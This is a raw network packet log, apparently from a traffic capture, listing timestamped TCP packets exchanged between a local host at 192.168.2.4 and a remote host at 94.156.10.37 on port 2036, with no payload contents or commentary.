Apr 14, 2024 08:45:13.863470078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863496065 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863507032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863545895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863555908 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863584042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863620043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863639116 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863658905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863698006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863724947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.871880054 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.871937990 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.871938944 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.871978998 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872014999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872049093 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872051954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872091055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872102976 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872132063 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872170925 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872184992 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872210979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872272968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872286081 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872311115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872347116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872369051 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872384071 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872421026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872442007 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872459888 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872498035 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872513056 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872535944 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872575998 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872595072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872612953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872649908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872664928 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872688055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872725964 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872744083 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872761965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872797966 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872818947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872836113 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872872114 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872886896 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872910023 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872947931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.872965097 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.872986078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.873023033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.873039007 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.876807928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.876847982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.876867056 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877007961 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877047062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877063990 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877085924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877124071 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877132893 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877168894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877207041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877218962 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877245903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877284050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877306938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877321005 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877373934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877376080 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877413988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877453089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877459049 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877494097 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877532959 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877546072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877571106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877608061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877623081 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.877645969 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877685070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.877696991 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.878060102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878098011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878108025 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.878140926 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878180027 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878187895 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.878217936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878257990 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878273010 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.878295898 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878334045 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878343105 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.878371000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.878417015 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.878972054 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879010916 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879048109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879060984 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879086018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879126072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879136086 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879165888 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879204988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879219055 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879244089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879280090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879292011 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879318953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879354954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879371881 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879393101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879434109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879436970 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879473925 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879512072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879523039 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879549980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879585981 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879602909 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879623890 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879662991 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879667997 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879765987 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879815102 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879838943 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879875898 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879914045 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879940987 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.879950047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879987955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.879998922 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880026102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880047083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880081892 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880083084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880120993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880151987 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880160093 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880198002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880204916 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880251884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880290031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880301952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880328894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880364895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880377054 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880403042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880439997 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880458117 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880475998 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880496979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880533934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880572081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880604982 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880609035 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880645990 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880666018 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880685091 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880723953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880733967 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880762100 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880800962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880826950 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880837917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880875111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880883932 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.880912066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880949974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.880959034 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.887926102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.887976885 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.887985945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.928011894 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.942382097 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.942434072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.942504883 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.087491989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087555885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087598085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087631941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.087635040 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087672949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087692022 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.087713957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087752104 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087770939 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.087793112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087831974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087847948 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.087872982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087913036 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087949991 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.087996006 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.087996006 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.089520931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089590073 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089628935 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089651108 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.089673996 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089714050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089730024 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.089752913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089792967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089809895 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.089831114 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089869022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089883089 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.089909077 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089946985 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.089962959 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.089986086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090023041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090039015 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090064049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090106010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090120077 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090147972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090188026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090204954 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090226889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090264082 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090296984 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090301037 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090338945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090356112 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090378046 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090415001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090435982 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090456963 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090493917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090512991 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090533972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090570927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090588093 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090609074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090646029 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090661049 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090683937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090719938 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090744972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090759993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090799093 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090812922 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090841055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090879917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090897083 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090919018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090955973 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.090971947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.090992928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.091029882 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.091044903 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.091070890 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.091109037 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.091126919 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.091149092 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.091206074 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099462032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099502087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099540949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099562883 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099579096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099617958 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099634886 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099656105 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099695921 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099710941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099737883 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099775076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099791050 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099812984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099850893 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099865913 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099889994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099927902 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.099942923 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.099966049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100003004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100018024 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100043058 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100079060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100092888 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100117922 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100157976 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100177050 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100197077 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100255966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100256920 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100296974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100332975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100351095 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100372076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100409985 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100431919 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100449085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100486994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100500107 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100527048 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100567102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100580931 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.100605965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.100657940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.102502108 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.102541924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.102610111 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.103353024 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103393078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103430986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103447914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.103468895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103507042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103518009 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.103543997 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103580952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103596926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.103620052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103657961 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103672981 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:14.103696108 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:14.103733063 CEST	2036	49736	94.156.10.37	192.168.2.4
